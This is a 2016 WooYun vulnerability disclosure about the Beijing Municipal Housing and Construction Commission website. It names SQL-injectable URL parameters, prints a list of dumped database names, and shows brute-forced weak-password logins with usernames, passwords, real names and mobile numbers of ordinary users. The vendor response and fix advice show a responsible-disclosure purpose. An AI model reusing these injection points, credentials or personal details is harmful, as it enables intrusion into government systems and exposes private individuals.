当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0199421

漏洞标题:北京市住建委漏洞打包(主站两处注入\可爆破获取用户信息)

相关厂商:北京市住房和城乡建设委员会

漏洞作者: 路人甲

提交时间:2016-04-22 22:40

修复时间:2016-06-10 19:00

公开时间:2016-06-10 19:00

漏洞类型:应用配置错误

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-22: 细节已通知厂商并且等待厂商处理中
2016-04-26: 厂商已经确认,细节仅向厂商公开
2016-05-06: 细节向核心白帽子及相关领域专家公开
2016-05-16: 细节向普通白帽子公开
2016-05-26: 细节向实习白帽子公开
2016-06-10: 细节向公众公开

简要描述:

再来一发

详细说明:

http://**.**.**.**/tabid/2159/Default.aspx?ModelKey=SendInfo&Contract_qyh=Y1741851&Contract_mf=%E5%BC%A0%E6%A1%82%E8%8A%AC&Contract_Password=666666


Contract_qyh和Contract_Password
两个参数存在注入
上一个是Contract_mf注入点,由于没有进一步测试,所以上次就发了一个,经过测试其他两个也存在注入

2222.png


3333.png


available databases [20]:
[*] application
[*] bjfdc
[*] bjfdc_for_auditburea
[*] bjfdc_tax
[*] bjhouse
[*] bjhouse_application
[*] bjrema
[*] datacenter
[*] figure
[*] jianceshi
[*] master
[*] model
[*] msdb
[*] policyhouse
[*] real_estate_analyse
[*] real_estate_analyse_bak
[*] real_estate_analyseImportdata
[*] tempdb
[*] ttib
[*] vk

漏洞证明:

http://**.**.**.**/enroll/home.jsp


自住型商品房网上申购系统,验证码没什么用,大量用户弱口令,仅测试top500用户名,密码采用
123456,111111,000000,用户名等

413	lirong	lirong	200	false	false	546	
352	zhangjing	zhangjing	200	false	false	547	
159	wangning	wangning	200	false	false	549	
329	wanglong	wanglong	200	false	false	551	
379	liuyuying	liuyuying	200	false	false	551	
478	zhangkun	zhangkun	200	false	false	551	
76	wangyulan	wangyulan	200	false	false	553	
400	zhanglijuan	zhanglijuan	200	false	false	553	
404	liguixiang	liguixiang	200	false	false	554	
270	wangshuzhen	wangshuzhen	200	false	false	557	
173	zhangfengying	zhangfengying	200	false	false	559	
1041	lixia	123456	200	false	false	543	
1312	lixiumei	123456	200	false	false	552	
686	chenfang	111111	200	false	false	553	
1943	wangjinfeng	000000	200	false	false	556	
1075	zhangguiying	123456	200	false	false	560


1111.png


{"flag":1,"message":"登录成功!","data":{"id":"54016","people_name":"李蓉","username":"lirong","email":"287084850@**.**.**.**","mobile":"15510318399"},"redirectUrl":null}
{"flag":1,"message":"登录成功!","data":{"id":"12033","people_name":"张晶","username":"zhangjing","email":"6032561@**.**.**.**","mobile":"13801623808"},"redirectUrl":null}
{"flag":1,"message":"登录成功!","data":{"id":"46993","people_name":"王宁","username":"wangning","email":"casio0018@**.**.**.**","mobile":"13521143322"},"redirectUrl":null}
{"flag":1,"message":"登录成功!","data":{"id":"30169","people_name":"王龙","username":"wanglong","email":"wl_post@**.**.**.**","mobile":"13810447522"},"redirectUrl":null}

修复方案:

注入问题content_在内部可能还别的地方,多查看一下
第二个系统把验证码处理一下,另外提醒用户修改密码

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-26 18:50

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向北京市政府信息化主管部门通报,并抄报北京分中心协助处置,由其后续协调网站管理单位处置。

最新状态:

暂无